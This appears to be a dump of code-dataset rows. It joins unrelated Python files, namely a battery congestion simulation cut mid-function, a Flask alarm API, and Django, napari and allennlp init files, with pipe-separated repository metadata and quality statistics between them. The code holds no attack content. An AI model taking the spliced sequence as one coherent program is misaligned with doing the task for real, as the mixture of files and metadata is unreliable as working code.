return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv', verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
def baseline(verbose_lvl=1, base_money_strat=True):
congestion_kw = 14000
congestion_safety_margin = 0.99
transportation_kw = 2000
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
greedy_discharge_strat = CsvStrategy('Greedy discharge', strategy_csv='data/strategies/greedy_discharge_60.csv')
always_discharge_strat = CsvStrategy('Always discharge', strategy_csv='data/strategies/always_discharge.csv')
solve_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Solve Congestion Controller",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=greedy_discharge_strat,
verbose_lvl=verbose_lvl)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=always_discharge_strat,
verbose_lvl=verbose_lvl)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=csv_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
if base_money_strat:
main_controller = ModesOfOperationController(name='Wombat main controller',
network_object=battery,
verbose_lvl=verbose_lvl)
main_controller.add_mode_of_operation(dt.time(4, 30, tzinfo=utc), earn_money_mod)
main_controller.add_mode_of_operation(dt.time(6, 45, tzinfo=utc), prepare_congestion_mod)
main_controller.add_mode_of_operation(dt.time(16, 45, tzinfo=utc), solve_congestion_mod)
main_controller.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
else:
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=battery, verbose_lvl=verbose_lvl)
for month_num in range(1, 13):
money_earn_strat_month = get_month_strategy(month_num)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name=f"GIGA Baseline Month {month_num}",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=money_earn_strat_month,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
single_month_controller = ModesOfOperationController(name='Wombat month controller',
network_object=battery,
verbose_lvl=verbose_lvl)
single_month_controller.add_mode_of_operation(dt.time(4, 30, tzinfo=utc), earn_money_mod)
single_month_controller.add_mode_of_operation(dt.time(6, 45, tzinfo=utc), prepare_congestion_mod)
single_month_controller.add_mode_of_operation(dt.time(16, 45, tzinfo=utc), solve_congestion_mod)
single_month_controller.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
main_controller.add_controller(single_month_controller)
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
# Run single day
# starting_timestep = 270555
# number_of_steps = 1440
# run_simulation(starting_timestep, number_of_steps, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
# Run single month
# run_single_month(7, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
# Run full scenario
return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv', verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
def run_monthly_timed_baseline(verbose_lvl=2, transportation_kw=2000, congestion_kw=14000, congestion_strategy=1, base_money_strat=True):
congestion_safety_margin = 0.99
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=csv_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
res_df = get_month_congestion_timings(solarvation_identifier='data/environments/lelystad_1_2021.csv', strategy=congestion_strategy)
print(res_df.to_string())
earning_money_until = res_df.loc['prep_start']
preparing_for_congestion_until = res_df.loc['congestion_start']
preparing_max_kwh = res_df.loc['prep_max_soc']
solving_congestion_until = res_df.loc['congestion_end']
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=battery,
verbose_lvl=verbose_lvl)
for month in range(12):
moo = ModesOfOperationController(name=f'Wombat controller month {month}',
network_object=battery,
verbose_lvl=verbose_lvl)
if not base_money_strat:
month_num = month + 1
money_earning_strat = get_month_strategy(month_num)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name=f"GIGA Baseline Month {month_num}",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=money_earning_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
if earning_money_until[month] is not NaT:
moo.add_mode_of_operation(earning_money_until[month], earn_money_mod)
max_kwh_in_prep = float(preparing_max_kwh[month])
max_soc_perc_in_prep = int(max_kwh_in_prep / battery.max_kwh * 100)
discharge_until_strategy = DischargeUntilStrategy(base_strategy=csv_strategy,
name='Discharge Money Earner',
discharge_until_soc_perc=max_soc_perc_in_prep
)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name=f"Earn money but discharge until {max_soc_perc_in_prep}",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=discharge_until_strategy,
verbose_lvl=verbose_lvl)
moo.add_mode_of_operation(preparing_for_congestion_until[month], prepare_congestion_mod)
moo.add_mode_of_operation(solving_congestion_until[month], prepare_congestion_mod)
moo.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
main_controller.add_controller(moo)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
verbose_lvl=verbose_lvl,
simulation_environment=imbalance_environment)
def run_random_strategy_with_monthly_times(verbose_lvl=1, seed=None, transportation_kw=2000, congestion_kw=14000):
congestion_safety_margin = 0.99
# Initialise environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
# Initialise solar farm
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
# Initialise battery
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
# Initialise random strategy
random_point_based_strategy = generate_random_discharge_relative_strategy(seed=seed)
if seed is None:
print(f'{random_point_based_strategy.name}')
greedy_discharge_strat = CsvStrategy('Greedy discharge', strategy_csv='data/strategies/greedy_discharge_60.csv')
always_discharge_strat = CsvStrategy('Always discharge', strategy_csv='data/strategies/always_discharge.csv')
solve_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Solve Congestion Controller",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=greedy_discharge_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=always_discharge_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=random_point_based_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
res_df = get_month_congestion_timings(solarvation_identifier='data/environments/lelystad_1_2021.csv', strategy=1)
print(res_df.to_string())
earning_money_until = res_df.loc['prep_start']
preparing_for_congestion_until = res_df.loc['congestion_start']
preparing_max_kwh = res_df.loc['prep_max_soc']
solving_congestion_until = res_df.loc['congestion_end']
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=battery,
verbose_lvl=verbose_lvl)
for month in range(12):
moo = ModesOfOperationController(name=f'Wombat controller month {month}',
network_object=battery,
verbose_lvl=verbose_lvl)
if earning_money_until[month] is not NaT:
moo.add_mode_of_operation(earning_money_until[month], earn_money_mod)
max_kwh_in_prep = float(preparing_max_kwh[month])
max_soc_perc_in_prep = int(max_kwh_in_prep / battery.max_kwh * 100)
discharge_until_strategy = DischargeUntilStrategy(base_strategy=random_point_based_strategy,
name='Discharge Money Earner',
discharge_until_soc_perc=max_soc_perc_in_prep
)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=discharge_until_strategy,
verbose_lvl=verbose_lvl)
moo.add_mode_of_operation(preparing_for_congestion_until[month], prepare_congestion_mod)
moo.add_mode_of_operation(solving_congestion_until[month], solve_congestion_mod)
moo.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
main_controller.add_controller(moo)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
verbose_lvl=verbose_lvl,
simulation_environment=imbalance_environment)
def run_single_month_random_strategy(verbose_lvl=1, seed=None, transportation_kw=2000, congestion_kw=14000, month=None):
random_point_based_strategy = generate_random_discharge_relative_strategy(seed=seed)
run_single_month_set_strategy(verbose_lvl, random_point_based_strategy, transportation_kw, congestion_kw, month)
def run_single_month_set_strategy(verbose_lvl=1, strategy=None, transportation_kw=2000, congestion_kw=14000, month=None):
if month is None and strategy is None:
return run_random_strategy_with_monthly_times(verbose_lvl, None, transportation_kw, congestion_kw)
congestion_safety_margin = 0.99
# Initialise environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
# Initialise solar farm
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
# Initialise battery
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
# Initialise random strategy
if strategy is None:
money_earning_strategy = generate_random_discharge_relative_strategy()
else:
money_earning_strategy = strategy
greedy_discharge_strat = CsvStrategy('Greedy discharge', strategy_csv='data/strategies/greedy_discharge_60.csv')
always_discharge_strat = CsvStrategy('Always discharge', strategy_csv='data/strategies/always_discharge.csv')
solve_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Solve Congestion Controller",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=greedy_discharge_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=money_earning_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
res_df = get_month_congestion_timings(solarvation_identifier='data/environments/lelystad_1_2021.csv', strategy=1)
earning_money_until = res_df.loc['prep_start']
preparing_for_congestion_until = res_df.loc['congestion_start']
preparing_max_kwh = res_df.loc['prep_max_soc']
solving_congestion_until = res_df.loc['congestion_end']
assert 12 >= month >= 1
month = month - 1
print(res_df[month].to_string())
moo = ModesOfOperationController(name=f'Wombat controller month {month}',
network_object=battery,
verbose_lvl=verbose_lvl)
if earning_money_until[month] is not NaT:
moo.add_mode_of_operation(earning_money_until[month], earn_money_mod)
max_kwh_in_prep = float(preparing_max_kwh[month])
max_soc_perc_in_prep = int(max_kwh_in_prep / battery.max_kwh * 100)
discharge_until_strategy = DischargeUntilStrategy(base_strategy=money_earning_strategy,
name=f'Discharge until {max_kwh_in_prep} -> Money Earner',
discharge_until_soc_perc=max_soc_perc_in_prep
)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=discharge_until_strategy,
verbose_lvl=verbose_lvl)
moo.add_mode_of_operation(preparing_for_congestion_until[month], prepare_congestion_mod)
moo.add_mode_of_operation(solving_congestion_until[month], solve_congestion_mod)
moo.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(moo, [1, 3, 4, 0])
# Run single day
starting_timestep = 129600 + 25 * 1440
number_of_steps = 2 * 1440
return run_simulation(starting_timestep, number_of_steps, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
# return run_single_month(month + 1, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
if __name__ == '__main__':
verbose_lvl = 1
# baseline_rhino_simulation(verbose_lvl)
# random_rhino_strategy_simulation(verbose_lvl=verbose_lvl, seed=4899458002697043430)
# rhino_windnet_limited_charging(verbose_lvl)
# full_rhino_site_capacity()
####################################################################
# congestion_causing_strategy = PointBasedStrategy('Congestion cause', price_step_size=2)
#
# congestion_causing_strategy.add_point((13, 152, 'CHARGE'))
# congestion_causing_strategy.add_point((25, 126, 'CHARGE'))
# congestion_causing_strategy.add_point((48, 108, 'CHARGE'))
# congestion_causing_strategy.add_point((61, 80, 'CHARGE'))
# congestion_causing_strategy.add_point((95, 26, 'CHARGE'))
# congestion_causing_strategy.add_point((32, 192, 'DISCHARGE'))
# congestion_causing_strategy.add_point((45, 154, 'DISCHARGE'))
# congestion_causing_strategy.add_point((76, 178, 'DISCHARGE'))
# congestion_causing_strategy.add_point((94, 164, 'DISCHARGE'))
# congestion_causing_strategy.add_point((95, -68, 'DISCHARGE'))
#
# congestion_causing_strategy.upload_strategy()
# print(congestion_causing_strategy)
# print(run_single_month_set_strategy(verbose_lvl, strategy=congestion_causing_strategy, month=4))
####################################################################
res_arr = []
temp_dict = solarvation_dumb_discharging(verbose_lvl)
temp_dict['name'] = 'Solarvation only discharging'
res_arr.append(temp_dict)
temp_dict = wombat_solarvation_limited_charging(verbose_lvl)
temp_dict['name'] = 'Wombat disregard congestion (with base money strat)'
res_arr.append(temp_dict)
temp_dict = wombat_solarvation_limited_charging(verbose_lvl, base_money_strat=False)
temp_dict['name'] = 'Wombat disregard congestion GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = super_naive_baseline(verbose_lvl)
temp_dict['name'] = 'Wombat only solve congestion'
res_arr.append(temp_dict)
temp_dict = baseline(verbose_lvl)
temp_dict['name'] = 'Wombat yearly timing (with base money strat)'
res_arr.append(temp_dict)
temp_dict = baseline(verbose_lvl, base_money_strat=False)
temp_dict['name'] = 'Wombat yearly timing GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=2)
print(temp_dict)
temp_dict['name'] = 'Wombat conservative monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=2, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat conservative monthly timed GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=1)
print(temp_dict)
temp_dict['name'] = 'Wombat smart monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=1, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat smart monthly timed GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=5)
print(temp_dict)
temp_dict['name'] = 'Wombat max smart monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=5, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat max smart monthly timed GIGA Baseline'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=6)
print(temp_dict)
temp_dict['name'] = 'Wombat avg smart monthly timed (with base money strat)'
res_arr.append(temp_dict)
temp_dict = run_monthly_timed_baseline(verbose_lvl, congestion_strategy=6, base_money_strat=False)
print(temp_dict)
temp_dict['name'] = 'Wombat avg smart monthly timed GIGA Baseline'
res_arr.append(temp_dict)
print(res_arr)
res_df = pd.DataFrame(res_arr)
print(res_df)
res_df.to_csv('data/baseline_earnings/auto_overview.csv')
| 61.933894 | 189 | 0.645733 | 5,357 | 51,529 | 5.841702 | 0.065335 | 0.076372 | 0.049434 | 0.058158 | 0.85796 | 0.83508 | 0.802071 | 0.784559 | 0.769253 | 0.736435 | 0 | 0.024659 | 0.282268 | 51,529 | 831 | 190 | 62.008424 | 0.82149 | 0.055852 | 0 | 0.659711 | 0 | 0 | 0.100258 | 0.036846 | 0 | 0 | 0 | 0 | 0.00321 | 1 | 0.033708 | false | 0.011236 | 0.038523 | 0 | 0.093098 | 0.05618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89c385a1cc6d309170885a93d4699d56f7794fde | 206 | py | Python | portfolio/admin.py | tmbyers1102/ourtsy_v1 | 23ace98c82b0677f9d6ef7ee1096286f78c10b7d | [
"MIT"
] | null | null | null | portfolio/admin.py | tmbyers1102/ourtsy_v1 | 23ace98c82b0677f9d6ef7ee1096286f78c10b7d | [
"MIT"
] | null | null | null | portfolio/admin.py | tmbyers1102/ourtsy_v1 | 23ace98c82b0677f9d6ef7ee1096286f78c10b7d | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import ArtItem, Artist, Portfolio, Genres
admin.site.register(ArtItem)
admin.site.register(Artist)
admin.site.register(Portfolio)
admin.site.register(Genres)
| 22.888889 | 54 | 0.815534 | 28 | 206 | 6 | 0.428571 | 0.214286 | 0.404762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082524 | 206 | 8 | 55 | 25.75 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
89f4f70a52e114be9f89d6e38ee641d9085fa765 | 192 | py | Python | napari/utils/context/__init__.py | MaksHess/napari | 64a144607342c02177fc62fa83a3442ace0a98e7 | [
"BSD-3-Clause"
] | 1,345 | 2019-03-03T21:14:14.000Z | 2022-03-31T19:46:39.000Z | napari/utils/context/__init__.py | MaksHess/napari | 64a144607342c02177fc62fa83a3442ace0a98e7 | [
"BSD-3-Clause"
] | 3,904 | 2019-03-02T01:30:24.000Z | 2022-03-31T20:17:27.000Z | napari/utils/context/__init__.py | MaksHess/napari | 64a144607342c02177fc62fa83a3442ace0a98e7 | [
"BSD-3-Clause"
] | 306 | 2019-03-29T17:09:10.000Z | 2022-03-30T09:54:11.000Z | from ._context import Context, create_context, get_context
from ._layerlist_context import LayerListContextKeys
__all__ = ['Context', 'create_context', 'get_context', 'LayerListContextKeys']
| 38.4 | 78 | 0.817708 | 20 | 192 | 7.3 | 0.4 | 0.178082 | 0.273973 | 0.315068 | 0.410959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088542 | 192 | 4 | 79 | 48 | 0.834286 | 0 | 0 | 0 | 0 | 0 | 0.270833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c38cd8e5d3c7e66e294d29f230be9348c21c717a | 6,073 | py | Python | api/alarm.py | ThinkmanWang/NotesServer | 86a1f7f56b30f94aaccd3d70941e3873cc1713e2 | [
"Apache-2.0"
] | null | null | null | api/alarm.py | ThinkmanWang/NotesServer | 86a1f7f56b30f94aaccd3d70941e3873cc1713e2 | [
"Apache-2.0"
] | 1 | 2021-06-01T21:40:51.000Z | 2021-06-01T21:40:51.000Z | api/alarm.py | ThinkmanWang/NotesServer | 86a1f7f56b30f94aaccd3d70941e3873cc1713e2 | [
"Apache-2.0"
] | null | null | null |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'models'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'utils'))
from imp import reload
import MySQLdb
import json
import hashlib
import time
import uuid
from flask import Flask, render_template, request, redirect, url_for, send_from_directory
from flask import render_template
from werkzeug import secure_filename
from utils.mysql_python import MysqlPython
from utils.object2json import obj2json
from models.RetModel import RetModel
from utils.user_db_utils import *
from utils.alarm_db_utils import *
from utils.note_db_utils import *
from models.Alarm import Alarm
from error_code import *
from flask import Blueprint
alarm_api = Blueprint('alarm_api', __name__)
#For alarm
@alarm_api.route("/api/get_alarm_list", methods=['POST', 'GET'])
def get_alarm_list():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form.get('uid', ''), request.form.get('token', ''))):
return obj2json(RetModel(21, dict_err_code[21], {}) )
lstAlarm = select_alarm_list(request.form['uid'], request.form.get('type', '0'))
szRet = obj2json(RetModel(0, dict_err_code[0], lstAlarm) )
return szRet
@alarm_api.route("/api/get_alarm", methods=['POST', 'GET'])
def get_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
szRet = obj2json(RetModel(1024, dict_err_code[1024], {}) )
return szRet
@alarm_api.route("/api/add_alarm", methods=['POST', 'GET'])
def add_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (request.form.get('id', None) is None):
return obj2json(RetModel(51, dict_err_code[51]))
if (request.form.get('note_id', None) is None):
return obj2json(RetModel(52, dict_err_code[52]))
if (request.form.get('date', None) is None):
return obj2json(RetModel(53, dict_err_code[53]))
if (request.form.get('update_date', None) is None):
return obj2json(RetModel(54, dict_err_code[54]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (False == if_noteid_exists(request.form['note_id'])):
return obj2json(RetModel(41, dict_err_code[41]))
if (True == insert_alarm(request.form['uid'], request.form['id'], request.form['note_id'], request.form['date'], request.form['update_date'])):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@alarm_api.route("/api/update_alarm", methods=['POST', 'GET'])
def update_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (request.form.get('id', None) is None):
return obj2json(RetModel(51, dict_err_code[51]))
if (request.form.get('note_id', None) is None):
return obj2json(RetModel(52, dict_err_code[52]))
if (request.form.get('date', None) is None):
return obj2json(RetModel(53, dict_err_code[53]))
if (request.form.get('update_date', None) is None):
return obj2json(RetModel(54, dict_err_code[54]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (False == if_noteid_exists(request.form['note_id'])):
return obj2json(RetModel(41, dict_err_code[41]))
szRet = ''
if (False == if_alarm_exists(request.form['id'])):
szRet = obj2json(RetModel(51, dict_err_code[51], {}) )
else:
if (True == update_alarm_info(request.form['uid'], request.form['id'], request.form['note_id'], request.form['date'], request.form['update_date'])):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@alarm_api.route("/api/delete_alarm", methods=['POST', 'GET'])
def delete_alarm():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(51, dict_err_code[51]))
if (False == if_alarm_exists(request.form['id'])):
return obj2json(RetModel(51, dict_err_code[51], {}))
if (remove_alarm(request.form['id'])):
return obj2json(RetModel(0, dict_err_code[0], {}) )
else:
return obj2json(RetModel(1000, dict_err_code[1000], {}) )
| 39.180645 | 157 | 0.621439 | 810 | 6,073 | 4.47284 | 0.111111 | 0.139663 | 0.109302 | 0.061827 | 0.810654 | 0.773392 | 0.73199 | 0.713773 | 0.677615 | 0.655258 | 0 | 0.038413 | 0.224107 | 6,073 | 154 | 158 | 39.435065 | 0.730475 | 0.001482 | 0 | 0.590909 | 0 | 0 | 0.062119 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.181818 | 0 | 0.527273 | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
c398962a05b59ebd5c5a8a3345848d78818a5d7f | 404 | py | Python | __init__.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | 1 | 2018-01-11T14:01:05.000Z | 2018-01-11T14:01:05.000Z | __init__.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | __init__.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | # Base
from observable_primitives.base import Observer, Observable
# Observables
from observable_primitives.observables import ObservableBool, ObservableComplex, \
ObservableFloat, ObservableInteger
# Observers
from observable_primitives.observers import IntegerConditionObserver, CounterConditionObserver, \
FloatConditionObserver, NumericPrintObserver, HoldNumericPrintObserver, PrintObserver
| 40.4 | 97 | 0.863861 | 30 | 404 | 11.533333 | 0.6 | 0.121387 | 0.208092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094059 | 404 | 9 | 98 | 44.888889 | 0.945355 | 0.064356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c3cb5390e87f183f80a8bf0466f97119b17ae589 | 608 | py | Python | allennlp/training/callbacks/__init__.py | MSLars/allennlp | 2cdb8742c8c8c3c38ace4bdfadbdc750a1aa2475 | [
"Apache-2.0"
] | null | null | null | allennlp/training/callbacks/__init__.py | MSLars/allennlp | 2cdb8742c8c8c3c38ace4bdfadbdc750a1aa2475 | [
"Apache-2.0"
] | 22 | 2021-10-08T21:52:18.000Z | 2021-12-24T01:00:47.000Z | allennlp/training/callbacks/__init__.py | MSLars/allennlp | 2cdb8742c8c8c3c38ace4bdfadbdc750a1aa2475 | [
"Apache-2.0"
] | null | null | null | from allennlp.training.callbacks.callback import TrainerCallback
from allennlp.training.callbacks.console_logger import ConsoleLoggerCallback
from allennlp.training.callbacks.confidence_checks import ConfidenceChecksCallback
from allennlp.training.callbacks.tensorboard import TensorBoardCallback
from allennlp.training.callbacks.track_epoch import TrackEpochCallback
from allennlp.training.callbacks.wandb import WandBCallback
